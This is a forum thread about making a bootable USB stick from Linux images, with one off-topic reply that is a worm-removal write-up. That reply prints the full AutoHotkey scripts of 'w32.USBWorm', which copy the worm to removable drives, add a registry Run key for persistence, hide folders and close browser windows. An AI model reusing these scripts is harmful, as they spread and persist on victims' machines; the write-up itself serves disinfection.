FRIHOSTFORUMSSEARCHFAQTOSBLOGSCOMPETITIONS
You are invited to Log in or Register a free Frihost Account!


Bootable USB-pen?





bostko
Is there some way to "burn" iso or img file in usb pen?
rvec
not with a normal image. Don't know what the differences are.

But if you want a boot usb-stick try searching google for DSL linux. That's a small linux distribution with a special usb version.
bostko
For example in fedora 7 disk there is a folder called images and in the readme is written:
Quote:
The diskboot.img file is a VFAT filesystem image that can be written to a
USB pendrive or other bootable media larger than a floppy. Note that
booting via USB is dependent on your BIOS supporting this. It should
be written to the device using dd.

And I don't know how to "burn" that in my usb?
kuyman
First make sure your computer's BIOS can actually boot from a USB device. Just look through the first boot device in the setup screen, you'll see it (or not).

The process of actually making your image bootable from a USB key is pretty tricky and dependent on your distro. Basically your run the image through a convertor that allows it to be booted like a CD. This is sometimes trickier than it sounds.

Try googling your distro for instructions on how to run it from a USB key.

Good look.
muggle
take a look at this site:

Boot and run Linux from a USB flash memory stick

I tried some of the images, they work just fine.
LostOverThere
Give SLAX a go. Its a USD/CD Bootable Linux made from Slackware. You can burn it to a USD Stick using a program called "MySLAX"
kuyman
I first used Slax a couple of years ago and remember it being very slick. It was a very smooth experience even running from a CD and I would back up the suggestion to give it a try.
mehulved
+1 for slax. It has really nice customisability. And being based on slackware, I'd believe it would be quite light on resources too.
mOrpheuS
LostOverThere wrote:
Give SLAX a go. Its a USD/CD Bootable Linux made from Slackware. You can burn it to a USD Stick using a program called "MySLAX"

For quite sometime now, the standard Slax ISO has contained a batch file called "bootinst.bat" that can directly install it to a USB drive without using a tool like MySlax.

Ofcourse, MySlax offers several other customization options apart from this.

@bostko, I'm not sure but the diskboot.img included with Fedora "should" be a byte-by-byte dump of a FAT16/32 filesystem.
You should be able to use a tool like Rawrite (command line) or WinRawrite (GUI based) to put the contents of the image to a disk.

p.s. - Be advised that the data on the USB disk is lost in the process.
djclue917
bostko wrote:
For example in fedora 7 disk there is a folder called images and in the readme is written:
Quote:
The diskboot.img file is a VFAT filesystem image that can be written to a
USB pendrive or other bootable media larger than a floppy. Note that
booting via USB is dependent on your BIOS supporting this. It should
be written to the device using dd.

And I don't know how to "burn" that in my usb?


I think the more appropriate term is to "disk dump" the contents of the image to the USB flash drive, right? Though disk dumping is possible, given that the right preparations are made, I think that there's a better or more standard way of doing it.
viraj
Yesterday, my friend Vinay gave me a usb disk and asked me to copy some movies and music into the disk. I took it home and plugged the USB into my system and scanned it with nod32. I detected some viruses which it removed successfully, least I knew that there was another worm which didn’t get detected and it was in to infect my system. I double clicked the USB drive and nothing happened. Hmm strange.. I right clicked and opened the USB drive and found there was no content. Autoplay appears only if there is a Autorun.inf file present in the root of the drive. I didn’t care it much and closed the window to copy data into the drive later.
I wanted to check my mail so ran my beloved browser Firefox, it opened and with in couple of seconds a message box popped up which said ” “I DNT HATE MOZILLA BUT USE IE OR ELSE…” and the header read “USE INTERNET EXPLORER YOU DOPE.” I was like what? It also terminated Firefox . This is when I remembered the Autoplay option in the usb drive. This is when I had to open Internet Explorer and Google this text and found the worm name is w32.USBWorm (it was now obvious). Next step was to search for a Removal Tool and to my amazement there was none available!! Nor I could find any information on how to remove it. I decided to give myself a try to remove this worm. I tried opening orkut and Bang another surprise. This is the message it popped up ” ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? ” now this is pissing me off. Now, i had no other option but to remove this worm from my system. I pressed ctrl+alt+del and found nothing suspesious there .

Lets see what this worm does

It runs a exe file which is name MicrosoftPowerpoint.exe which is located in the USB disk. The autorun.inf runs this file when double clicked. Once this program is run you are infected. It hides all your hidden folders, runs the process in the memory, makes the worm to start with windows and pops those annoying messages. This worm doesn’t destroy any system files. It just infects other USB drives and spreads to new hosts.

It’s time to KO the Worm

I have PE Tools installed in my PC i ran to find out the running process. I went through all the process and found out that svchost.exe was the one responsible for it. Where PE tools helped me was, svchost.exe was running from a location C:\heap41a . So this is where the worm resides, hmm interesting now deleting the folder would do our task. But it was not so easy, as I terminated this process svchost.exe from the process list it would start again. So I had to boot my XP in safe mode. Why in safe mode is because in safe mode windows loads only the minimum required drivers and doesn’t load any user process, so this means the worm is not started with the windows. Now I searched the folder C:\heap41b but it was hidden. I went to Tools>folder option and select Show all files and folders and pressed ok. I refreshed the c:\ only to find that it won’t show any hidden folders. I again went to the Tools>folder and found the setting of Show all files and folders was reseted. Now how do I see the content, what I did was went to windows search and in advanced option I gave search hidden files and folders and gave svchost.exe as the search keyword. Bang it searched it, so I opened the folder to find out this file was not alone, the other files in this Folder were [offspring], 2.mp3, Icon.ico, reproduce.txt, svchost.exe, drivelist.txt, script1.txt, std.txt . Lets see the content of these text files.

[offspring] - Blank Folder

2.mp3 - A laughing sound

Icon.ico - A blank Icon file

reproduce.txt

#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

Loop %ArrayCount%
{

element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1

}

}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return

svchost.exe

This is the file that is the culprit. The file responsible for all the annoying pop ups

script1.txt

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE…,30
return
}
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

}
return

std.txt

#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

These files gave away all that this worm does, after reading the script I found out that this worm also hates Youtube lol.. Most important information it gave was the Registery Keys it modified.

These are the keys that were responsible for the hidden folder problem I faced earlier

regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\

Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2

Now to rectify this go to Start Menu>Run and type regedit . In the Registry Editor browse to this entry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\

CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL and in the “Checked all” key reset it back to 1 from 2. Now you can change the settings in the folders option. Now delete the folder C:\heap41a and clear all the key entries from this registry entry HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\policies\Explorer\Run which says heap41a.

Now the virus infection is removed 100%. Before you are done make sure you format the usb drive it doesn’t infect other systems too.

All the best. Untill a tool is out for this worm, you can follow this method to remove w32.USBWorm.
bostko
I tried everything but with no success. I remember once I have succeded to boot from usb with Damn small linux but then I used some program in windows to make my usb bootable. Any other suggestions Laughing
Related topics
Best Recover/undelete Files Aplication
usb pen linux dristo
i have an ecs k7s5a pro with problems..[ ..::SOLVED::.. ]
Need help booting from USB (Dell BIOS)
hey...how do u create a USB boot disk?
WHAT IS YOUR FAVORITE ELECTRONICS BRAND?
help me split my *.ISO
Linux In USB PenDrive/CD
Preservation of Self Made Movie
converting a self made movie
Booting Win XP or Ultimate CD 4 Win on USB HDD
switching between GRUB and windows boot manager
n0rW1n's blog
Trek 1.8 inch USB HDD - not bootable
Reply to topic    Frihost Forum Index -> Computers -> Software

FRIHOST HOME | FAQ | TOS | ABOUT US | CONTACT US | SITE MAP
© 2005-2011 Frihost, forums powered by phpBB.